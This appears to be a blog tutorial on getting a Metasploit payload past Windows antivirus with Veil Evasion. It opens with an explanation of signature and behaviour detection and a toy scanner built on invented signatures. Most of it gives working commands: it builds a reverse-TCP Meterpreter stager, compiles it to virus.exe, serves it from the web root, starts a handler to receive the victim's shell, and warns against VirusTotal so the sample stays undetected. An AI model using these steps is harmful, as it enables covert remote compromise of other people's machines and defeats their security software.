Learn how to bypass antivirus to perform Windows hacking (ONLY FOR EDUCATIONAL PURPOSES)

INTRODUCTION

Hello everyone. In the previous article we saw how to compromise a Windows machine with Metasploit. The major problem with a payload generated directly by msfvenom is that it gets detected by antivirus, because nearly every antivirus vendor has had signatures for the stock Metasploit payloads for years. In this article we are going to see how to get past that detection by wrapping the payload in an encrypted, freshly compiled executable so that its on-disk bytes no longer match those signatures.


HOW ANTIVIRUS WORKS?

Before we jump into bypassing antivirus, we need a basic idea of how antivirus works. So let's find out.

Broadly, there are two ways an antivirus distinguishes a normal file from a malicious one:

  1. Signature-based detection: The product ships a large database of signatures (byte patterns and file hashes extracted from known malware). When a file lands on the computer, the scanner compares it against every signature and flags the file if any pattern matches. This is fast, but a sample that is not in the database (or whose bytes have been changed so the pattern no longer occurs) is allowed to run.
  2. Sandbox/behaviour-based detection: The product executes the file in a controlled virtual environment and flags it based on what it does (process injection, outbound connections, persistence). This is far more accurate against unknown samples, but slower and more resource-hungry, and it catches encrypted payloads at the moment they decrypt themselves in memory.

Most consumer antivirus products still lean heavily on static signatures, which is what this article targets. Keep in mind, though, that modern products combine signatures with heuristics, behaviour monitoring and cloud lookups, so changing the on-disk bytes alone is no guarantee of evasion.
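To make the signature-versus-encryption point concrete, here is a small Python script added as an illustration (it is not code from the original article and not Veil's code). It implements a toy static scanner with a constructed signature database, shows that a sample containing a known byte pattern is flagged, that the XOR-encrypted copy on disk is not, and that decrypting it (what a stub like Veil's does in memory at run time) restores the match, which is exactly the window a behaviour-based engine watches. It also shows why exact-hash signatures are weaker than pattern signatures: a one-byte change in filler defeats the hash but not the pattern. The signature bytes, the "payload" and the key are all made up; no real shellcode is involved.

```python
"""Toy static-signature scanner (added example, not the article's or Veil's code).

Everything here is constructed for illustration: the signature database,
the "payload" bytes and the XOR key are invented and carry no real shellcode.
"""
from __future__ import annotations

import hashlib

# Constructed signature database. A real vendor DB holds byte patterns and
# file hashes extracted from known-malicious samples; these are invented.
PATTERN_SIGNATURES: dict[str, bytes] = {
    "Demo.Stager.A": bytes.fromhex("fce8820000006089e531c0648b50308b520c8b5214"),
    "Demo.Dropper.B": b"MZ\x90\x00EVIL",
}


def build_sample(pattern_name: str) -> bytes:
    """Construct a fake 'file': filler bytes around one known-bad pattern."""
    return b"HEADER" + PATTERN_SIGNATURES[pattern_name] + b"TRAILER"


# Hash-based signatures: the exact SHA-256 of a known sample. Computed from
# the constructed sample above so the demo stays self-contained.
HASH_SIGNATURES: dict[str, str] = {
    "Demo.Stager.A": hashlib.sha256(build_sample("Demo.Stager.A")).hexdigest(),
}


def scan_patterns(data: bytes) -> list[str]:
    """Names of every pattern signature that occurs somewhere in data."""
    return [name for name, pattern in PATTERN_SIGNATURES.items() if pattern in data]


def scan_hashes(data: bytes) -> list[str]:
    """Names whose exact file hash matches data (breaks on any one-byte change)."""
    digest = hashlib.sha256(data).hexdigest()
    return [name for name, known in HASH_SIGNATURES.items() if known == digest]


def xor_crypt(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; applying it twice with the same key decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def demo() -> dict[str, list[str]]:
    """Walk a constructed payload through the states a scanner can see."""
    payload = build_sample("Demo.Stager.A")
    key = b"veil-demo-key"                 # constructed key; a real stub embeds its own
    on_disk = xor_crypt(payload, key)      # what a static scanner reads from disk
    in_memory = xor_crypt(on_disk, key)    # what the stub restores at run time
    tweaked = payload.replace(b"TRAILER", b"TRAILEX")  # one filler byte changed
    return {
        "plain_pattern": scan_patterns(payload),        # flagged
        "plain_hash": scan_hashes(payload),             # flagged
        "encrypted_pattern": scan_patterns(on_disk),    # clean: bytes changed
        "encrypted_hash": scan_hashes(on_disk),         # clean: hash changed
        "decrypted_pattern": scan_patterns(in_memory),  # flagged again in memory
        "tweaked_pattern": scan_patterns(tweaked),      # pattern still fires
        "tweaked_hash": scan_hashes(tweaked),           # hash signature defeated
    }


if __name__ == "__main__":
    for state, hits in demo().items():
        print(f"{state:>18}: {hits or 'clean'}")
```

The encrypted copy passes the static scan only because the scanner never sees the decrypted bytes; the moment the stub decrypts and runs them, a memory scan or a sandbox sees the same pattern the plain file had. That is the gap Veil exploits and the reason behaviour-based engines close it.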

Now that we have understood how antivirus works, let us learn how we can create a payload that can bypass antivirus.

WINDOWS HACKING: BYPASSING AV

INSTALLING VEIL EVASION

First of all, we need to install the Veil Evasion tool on our machine. To install it on Kali Linux, follow these steps:

1. In the Kali terminal, type sudo apt install veil -y.

Figure: Windows Hacking: Installing Veil

2. After this, type veil in the terminal. On first run Veil launches its setup script, which installs Wine and a Windows Python environment used to build the executables; this takes a while and needs a network connection. Once it finishes, Veil is installed on your machine.

CREATING PAYLOAD

Follow the given steps to create a payload using veil:

1. Type sudo veil in the terminal and hit enter.

2. Here, we need to choose Evasion, since we want to evade (bypass) antivirus. Therefore, type use 1 and hit enter.

3. Veil reports how many payloads it has loaded (41 in the version shown here). Type list to view each of them.

4. We are going to use the payload at position 28 (in Veil 3 this is python/meterpreter/rev_tcp.py, a Python reverse TCP Meterpreter stager; the listener later in this article uses the matching Metasploit payload). Type use 28 and hit enter.

5. After that, configure LHOST (the IP the target will connect back to) and LPORT (the port your listener will use), then type generate:

set LHOST <YOUR_LOCAL_IP>
set LPORT <YOUR_LOCAL_PORT>
generate

6. Veil will now ask you to name the output file. After naming it, Veil asks whether to use PyInstaller or Py2Exe. Both tools turn the generated Python script into a Windows executable (.exe). We choose 1, PyInstaller, because it is somewhat more reliable than Py2Exe.

7. Finally, our payload is created.

The executable is stored in the /var/lib/veil/output/compiled/ directory. We can move it wherever we want with a simple mv, for example into the Apache web root so the target can fetch it over HTTP:

sudo mv /var/lib/veil/output/compiled/virus.exe <Your Directory>
Eg:
sudo mv /var/lib/veil/output/compiled/virus.exe /var/www/html/

And that's it! We now have a payload that a signature-based scanner did not flag at the time of writing. I have scanned the file with Quick Heal Total Security and the result is attached below:

One caveat: do not upload the file to VirusTotal or similar multi-engine services to "check" it. Those services share uploaded samples with vendors, so the payload will be signatured quickly.

Now we can start our listener from Metasploit. If you don't know what a listener and a payload are, check out this article for reference.

Listener commands (the payload must match the one Veil generated, which for python/meterpreter/rev_tcp.py is python/meterpreter/reverse_tcp; Veil also writes a ready-made handler resource file under /var/lib/veil/output/handlers/ that can be loaded with msfconsole -r):

msfconsole
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
set LHOST <Your_Local_IP>
set LPORT <Your_Local_Port>
exploit

After starting the listener, run virus.exe on the target machine and you will get a Meterpreter session in the Kali terminal.

If you want to learn Windows hacking in depth, I recommend this beginner-friendly course, "Hacking Windows With Python From Scratch (2022)", in which you will learn:

  • Creating Undetectable Payload
  • Execute shell commands, download and upload files and access webcam.
  • Hack any windows based machine and get full access.
  • Bind payload with any files.
  • How black hat hackers get unauthorized access to windows machine.

Click here to visit the course.

CONCLUSION

I hope that you all have understood how we can create a payload that can be used to bypass antivirus using veil evasion. If you have any doubts or issues then please let me know in the comment section.
